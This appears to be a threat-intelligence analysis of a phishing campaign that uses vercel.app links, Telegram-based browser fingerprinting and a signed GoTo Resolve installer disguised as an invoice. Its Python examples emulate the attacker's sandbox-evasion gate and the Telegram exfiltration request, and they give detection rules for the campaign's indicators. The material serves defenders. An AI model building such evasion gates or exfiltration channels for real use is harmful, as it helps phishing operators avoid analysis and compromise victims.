A phishing campaign active between November 2025 and January 2026 has been identified abusing Vercel’s legitimate hosting platform to deliver a remote access tool. The attack chain combines financially themed social engineering with hosting on a trusted domain, so the lure links pass reputation-based URL filtering, and it ends not with custom malware but with a legitimately signed remote access product that most signature-based defenses will not flag.
The threat actors use financially themed lures such as overdue invoice notifications, payment statements, and shipping documents. The messages are written to create urgency and push recipients into clicking the embedded links. Compared with the straightforward malware-delivery phishing seen earlier, this campaign adds visitor filtering and other evasion steps between the click and the payload.
The emails lean on urgency-driven language such as “43 days past due” or warnings of imminent service suspension to pressure recipients into interacting with the hyperlinked content. Because the links point at Vercel’s well-reputed vercel.app infrastructure rather than a freshly registered domain, they are less likely to be blocked by domain-reputation filters, and the familiar hosting brand lends the page a false sense of legitimacy.
Some variants target specific regions. Spanish-language emails, for instance, impersonate security update notifications. Other variants impersonate legitimate services such as Adobe PDF viewers or recognized financial portals, which further raises the lure’s credibility and the likelihood that a recipient follows through.
Cloudflare analysts identified the campaign while investigating patterns of Vercel platform abuse. Their findings show that it has evolved considerably since CyberArmor first documented it in June 2025. In particular, the operators have added Telegram-based filtering designed to keep security researchers and automated sandboxes away from the malicious payload, which makes analysis harder and reduces the campaign’s visibility to detection tooling.
Infection Through Browser Fingerprinting and Conditional Delivery
When a victim clicks a malicious Vercel link, an evasion stage runs before any payload is served. The attacker’s page fingerprints the visiting browser, collecting the visitor’s IP address, device type, browser version, and geographic location, and sends this data to a Telegram channel controlled by the threat actors.
Automation behind that Telegram channel evaluates the fingerprint to decide whether the visitor is a genuine target. Security researchers, sandboxes, and other suspicious connections are filtered out and never see the next stage; only approved visitors are forwarded to a fake document viewer. This conditional delivery keeps the payload out of reach of most automated analysis, so a benign verdict from a sandbox or URL scanner that fetched the link is not evidence that the link is safe.
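The gate described above, emulated in Python as an added example (this is not code recovered from the campaign). The page states which data is collected and that Telegram is used for filtering, but not which rules decide who is “approved”; the fingerprint field names, the datacenter range, the automation markers, and the decision order below are assumptions about how such a gate is typically built, and the sample fingerprints are constructed.

```python
"""Emulation of the fingerprint-and-gate flow: collect, ship to Telegram, decide.

Added example, not code from the campaign. The page says IP address, device
type, browser version and location are collected and evaluated via Telegram;
the field names and every rule below are assumptions for illustration.
"""
import ipaddress
import json
from urllib.parse import urlparse

# Constructed fingerprints shaped like what a landing-page script might post.
SAMPLE_FINGERPRINTS = [
    {   # interactive Windows user on a residential ISP address
        "ip": "203.0.113.45",
        "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0",
        "platform": "Win32", "languages": ["en-US", "en"], "webdriver": False,
        "screen": {"width": 1920, "height": 1080}, "country": "US",
    },
    {   # sandbox detonation: headless UA, automation flag, datacenter egress
        "ip": "198.51.100.7",
        "userAgent": "Mozilla/5.0 HeadlessChrome/131.0",
        "platform": "Linux x86_64", "languages": [], "webdriver": True,
        "screen": {"width": 800, "height": 600}, "country": "US",
    },
    {   # URL scanner fetching with a library client from a cloud range
        "ip": "198.51.100.200",
        "userAgent": "python-requests/2.32",
        "platform": "", "languages": [], "webdriver": False,
        "screen": {}, "country": "DE",
    },
]

# Assumed rule inputs. 198.51.100.0/24 is a documentation range standing in
# for the real cloud/datacenter egress blocks an operator would list.
DATACENTER_NETS = [ipaddress.ip_network("198.51.100.0/24")]
AUTOMATION_MARKERS = ("HeadlessChrome", "PhantomJS", "python-requests",
                      "curl/", "Go-http-client")


def is_datacenter(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in DATACENTER_NETS)


def gate_decision(fp: dict) -> tuple[str, str]:
    """Return ("decoy", why) for visitors to turn away, ("lure", why) otherwise.

    Cheap, high-confidence automation markers are checked first, then the
    network origin, then the plausibility of the browser environment.
    """
    ua = fp.get("userAgent", "")
    if fp.get("webdriver"):
        return "decoy", "navigator.webdriver is set"
    if any(marker in ua for marker in AUTOMATION_MARKERS):
        return "decoy", "automation user agent"
    if is_datacenter(fp.get("ip", "0.0.0.0")):
        return "decoy", "datacenter egress address"
    if not fp.get("languages"):
        return "decoy", "no navigator.languages"
    if fp.get("screen", {}).get("width", 0) < 1024:
        return "decoy", "implausibly small screen"
    return "lure", "looks like an interactive end-user browser"


def telegram_exfil_request(bot_token: str, chat_id: str, fp: dict) -> dict:
    """Shape of the Telegram Bot API call that ships a fingerprint.

    sendMessage is the public Bot API method; token and chat id are
    placeholders. For defenders the URL pattern is the point: a browser
    POSTing to api.telegram.org/bot<token>/... right after loading a
    "document viewer" page is not normal end-user traffic.
    """
    return {
        "method": "POST",
        "url": f"https://api.telegram.org/bot{bot_token}/sendMessage",
        "json": {"chat_id": chat_id,
                 "text": json.dumps(fp, separators=(",", ":"))},
    }


def run_gate(fingerprints=SAMPLE_FINGERPRINTS) -> list[tuple[str, str, str]]:
    """Apply the gate to each fingerprint; returns (ip, decision, reason)."""
    return [(fp["ip"], *gate_decision(fp)) for fp in fingerprints]


if __name__ == "__main__":
    for ip, decision, why in run_gate():
        print(f"{ip:16} {decision:5} {why}")
    req = telegram_exfil_request("<bot-token>", "<chat-id>", SAMPLE_FINGERPRINTS[0])
    print(urlparse(req["url"]).netloc, req["method"])
```

The practical consequence for analysts: a detonation from a cloud-hosted sandbox or a URL scanner lands on the decoy branch and reports a harmless page, so such a verdict is inconclusive for this campaign. Retrieve the page through residential egress with a real, non-automated browser profile, and hunt in web proxy logs for browser-originated POSTs to the Telegram Bot API rather than relying on sandbox output.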
The fake viewer then prompts the user to download a file disguised as a document. The names mimic financial records, such as “Statements05122025.exe” or “Invoice06092025.exe.bin”, the latter hiding the executable extension behind a second, innocuous-looking one. The payload is not custom-developed malware. Instead, the attackers deliver a legitimate, validly signed copy of GoTo Resolve, the remote support product from GoTo, the company formerly known as LogMeIn.
By repurposing a trusted commercial tool in this way, which the researchers describe as a “Living off the Land” approach, the attackers sidestep signature-based antivirus: the binary is a known-good, vendor-signed product, not a malicious hash. Once executed, GoTo Resolve connects out to the remote-access service under the attacker’s control and grants full interactive control of the compromised machine, from which further malicious activity can follow. Because the binary itself is clean, detection has to be behavioural: a remote support tool launched from a user’s Downloads folder on a host where no such tool is sanctioned.
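Detection logic for the indicators in the two paragraphs above (the vercel.app financial lure, the browser-originated Telegram Bot API POST, the document-named executables including the double-extension variant, and a signed RMM product launched from a user-writable path), written in Python as an added example. The events, their field names, the user-writable path list, and the Program Files install path are constructed assumptions, not telemetry from the campaign; map the fields onto your own email gateway, proxy, and EDR schemas.

```python
"""Rule set for the campaign's observable indicators, run over constructed
email/proxy/download/process events. Added example; event shapes, the
user-writable path list and the install path are assumptions.
"""
import re
from urllib.parse import urlparse

FINANCIAL = re.compile(r"\b(invoice|statement|payment|receipt|remittance|shipping|overdue)", re.I)
URGENCY = re.compile(r"(\d+\s+days?\s+past\s+due|suspend|suspension|final\s+notice)", re.I)
# Financial word, a run of digits (the campaign used dates), an executable
# extension, optionally followed by a decoy trailing extension as in
# "Invoice06092025.exe.bin".
LURE_FILENAME = re.compile(
    r"^(invoice|statement|payment|receipt)s?\d{6,8}"
    r"\.(exe|scr|msi|bat|cmd|js|vbs|hta)(\.[a-z0-9]{1,4})?$", re.I)
# Assumed user-writable locations a legitimate RMM deployment would not use.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(downloads|desktop|appdata\\local\\temp)\\", re.I)
TELEGRAM_BOT_PATH = re.compile(r"^/bot[^/]+/\w+$")
# Remote-support products to treat as RMM; extend with whatever your
# organisation has not sanctioned.
RMM_PRODUCTS = {"goto resolve"}

# Constructed events. Token in the Telegram URL is elided on purpose.
SAMPLE_EVENTS = [
    {"type": "email", "id": "m1", "subject": "Statement of account: 43 days past due",
     "links": ["https://payments-portal-9k2l.vercel.app/view"]},
    {"type": "email", "id": "m2", "subject": "Weekly engineering sync",   # benign Vercel use
     "links": ["https://my-team-dashboard.vercel.app/"]},
    {"type": "proxy", "id": "p1", "user": "alice", "method": "POST",
     "url": "https://api.telegram.org/bot<token>/sendMessage",
     "referrer": "https://payments-portal-9k2l.vercel.app/view"},
    {"type": "download", "id": "d1", "user": "alice", "filename": "Invoice06092025.exe.bin"},
    {"type": "download", "id": "d2", "user": "bob", "filename": "Invoice_June.pdf"},
    {"type": "process", "id": "x1", "user": "alice",
     "image": r"C:\Users\alice\Downloads\Statements05122025.exe",
     "product": "GoTo Resolve", "signed": True},
    {"type": "process", "id": "x2", "user": "SYSTEM",   # hypothetical sanctioned install path
     "image": r"C:\Program Files (x86)\GoTo\GoTo Resolve\gotoresolve.exe",
     "product": "GoTo Resolve", "signed": True},
]


def is_vercel_host(host: str) -> bool:
    host = host.lower()
    return host == "vercel.app" or host.endswith(".vercel.app")


def rule_lure_email(ev: dict):
    if ev["type"] != "email":
        return None
    hosts = [urlparse(u).hostname or "" for u in ev.get("links", [])]
    themed = FINANCIAL.search(ev["subject"]) or URGENCY.search(ev["subject"])
    if themed and any(is_vercel_host(h) for h in hosts):
        return "financial/urgency lure linking to vercel.app"


def rule_telegram_bot_post(ev: dict):
    if ev["type"] != "proxy" or ev.get("method") != "POST":
        return None
    u = urlparse(ev["url"])
    if u.hostname == "api.telegram.org" and TELEGRAM_BOT_PATH.match(u.path or ""):
        ref = urlparse(ev.get("referrer", "")).hostname or ""
        why = "POST to Telegram Bot API from a user endpoint"
        return f"{why} (referrer {ref})" if ref else why


def rule_lure_filename(ev: dict):
    if ev["type"] != "download":
        return None
    if LURE_FILENAME.match(ev["filename"]):
        return "executable named like a financial document"


def rule_rmm_from_user_path(ev: dict):
    if ev["type"] != "process":
        return None
    if ev.get("product", "").lower() in RMM_PRODUCTS and USER_WRITABLE.search(ev["image"]):
        return "signed RMM tool launched from a user-writable path"


RULES = (rule_lure_email, rule_telegram_bot_post, rule_lure_filename, rule_rmm_from_user_path)


def detect(events=SAMPLE_EVENTS) -> list[tuple[str, str]]:
    """Return (event id, reason) for every event that trips a rule."""
    hits = []
    for ev in events:
        for rule in RULES:
            why = rule(ev)
            if why:
                hits.append((ev["id"], why))
    return hits


if __name__ == "__main__":
    for event_id, why in detect():
        print(f"{event_id}: {why}")
```

None of these rules is conclusive alone: Vercel hosts plenty of legitimate sites, and a sanctioned GoTo Resolve install from Program Files must not alert. The value is in correlating them per user within a short window, as the sample does for alice, where the lure email, the Telegram POST, the renamed download and the RMM launch from Downloads form the complete chain.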
Taken together, the campaign’s operational security, with Telegram used both for exfiltrating fingerprints and for filtering visitors, and its abuse of a trusted platform like Vercel, makes it hard to block at the perimeter. Its reliance on a legitimate, signed remote access tool rather than custom malware further complicates detection and attribution, and pushes defenders toward behavioural monitoring of remote-support software and tighter control over which such tools are permitted to run.

